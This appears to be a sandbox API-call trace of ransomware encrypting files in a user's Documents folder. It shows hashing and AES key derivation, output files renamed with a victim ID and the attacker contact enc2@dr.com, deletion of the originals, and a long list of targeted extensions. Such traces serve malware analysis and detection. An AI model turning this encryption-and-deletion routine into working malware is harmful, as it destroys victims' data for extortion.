	[0184.496] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0184.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.499] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0184.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.499] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0184.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.499] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0184.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.500] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x7a19, dwBufLen=0x7a19 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x7a20) returned 1
	[0184.501] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.501] RtlMoveMemory (in: Destination=0xfe4ba8, Source=0xfdd180, Length=0x7a19 | out: Destination=0xfe4ba8) 
	[0184.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.501] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4ba8*, pdwDataLen=0x18bc0c*=0x7a19, dwBufLen=0x7a20 | out: pbData=0xfe4ba8*, pdwDataLen=0x18bc0c*=0x7a20) returned 1
	[0184.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.505] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0184.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.505] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0184.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.505] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0184.506] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.506] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0184.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0184.507] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0184.509] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0184.509] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0184.510] WriteFile (in: hFile=0x388, lpBuffer=0xfe4ba8*, nNumberOfBytesToWrite=0x7a20, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe4ba8*, lpNumberOfBytesWritten=0x18c068*=0x7a20, lpOverlapped=0x0) returned 1
	[0184.515] CloseHandle (hObject=0x388) returned 1
	[0184.515] CloseHandle (hObject=0x384) returned 1
	[0184.515] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx")) returned 1
	[0184.524] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\0jwpqvra-.xlsx")) returned 0
	[0184.525] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e03310, ftCreationTime.dwHighDateTime=0x1d97148, ftLastAccessTime.dwLowDateTime=0xc85fca10, ftLastAccessTime.dwHighDateTime=0x1d9748a, ftLastWriteTime.dwLowDateTime=0xc85fca10, ftLastWriteTime.dwHighDateTime=0x1d9748a, nFileSizeHigh=0x0, nFileSizeLow=0x18906, dwReserved0=0x0, dwReserved1=0x0, cFileName="3V9wXvgS.ppt", cAlternateFileName="")) returned 1
	[0184.525] lstrcmpW (lpString1="3V9wXvgS.ppt", lpString2="..") returned 1
	[0184.525] lstrcmpW (lpString1="3V9wXvgS.ppt", lpString2=".") returned 1
	[0184.525] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0184.525] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="3V9wXvgS.ppt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\3V9wXvgS.ppt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\3V9wXvgS.ppt"
	[0184.525] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\3V9wXvgS.ppt") returned 44
	[0184.525] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0184.526] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\3V9wXvgS.ppt", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt") returned 0x2c
	[0184.526] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.526] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt", lpSrch="help_decrypt_your_files") returned 0x0
	[0184.526] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt") returned="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt"
	[0184.526] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt") returned 44
	[0184.526] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0184.526] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.527] StrStrW (lpFirst=".ppt", lpSrch=".") returned=".ppt"
	[0184.527] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.527] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ppt") returned=".ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0184.527] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0184.528] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0184.528] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0184.788] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x18906, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x18906, lpOverlapped=0x0) returned 1
	[0185.027] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.027] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0185.031] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.031] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.031] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.031] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.032] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0185.032] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.032] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x18906, dwBufLen=0x18906 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x18910) returned 1
	[0185.036] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.037] RtlMoveMemory (in: Destination=0xff5a90, Source=0xfdd180, Length=0x18906 | out: Destination=0xff5a90) 
	[0185.037] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.037] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5a90*, pdwDataLen=0x18bc0c*=0x18906, dwBufLen=0x18910 | out: pbData=0xff5a90*, pdwDataLen=0x18bc0c*=0x18910) returned 1
	[0185.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.041] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0185.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.041] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0185.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.042] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0185.042] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.042] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.043] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.045] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 86
	[0185.045] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.125] WriteFile (in: hFile=0x2c0, lpBuffer=0xff5a90*, nNumberOfBytesToWrite=0x18910, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff5a90*, lpNumberOfBytesWritten=0x18c068*=0x18910, lpOverlapped=0x0) returned 1
	[0185.132] CloseHandle (hObject=0x2c0) returned 1
	[0185.132] CloseHandle (hObject=0x384) returned 1
	[0185.132] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt")) returned 1
	[0185.156] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\3v9wxvgs.ppt")) returned 0
	[0185.157] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66879e60, ftCreationTime.dwHighDateTime=0x1d90565, ftLastAccessTime.dwLowDateTime=0x96650fa0, ftLastAccessTime.dwHighDateTime=0x1d9614a, ftLastWriteTime.dwLowDateTime=0x96650fa0, ftLastWriteTime.dwHighDateTime=0x1d9614a, nFileSizeHigh=0x0, nFileSizeLow=0x27a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="7PmVrZg zr y.xlsx", cAlternateFileName="7PMVRZ~1.XLS")) returned 1
	[0185.157] lstrcmpW (lpString1="7PmVrZg zr y.xlsx", lpString2="..") returned 1
	[0185.158] lstrcmpW (lpString1="7PmVrZg zr y.xlsx", lpString2=".") returned 1
	[0185.158] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.158] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="7PmVrZg zr y.xlsx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\7PmVrZg zr y.xlsx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\7PmVrZg zr y.xlsx"
	[0185.158] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\7PmVrZg zr y.xlsx") returned 49
	[0185.159] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.159] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\7PmVrZg zr y.xlsx", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx") returned 0x31
	[0185.159] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.160] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx", lpSrch="help_decrypt_your_files") returned 0x0
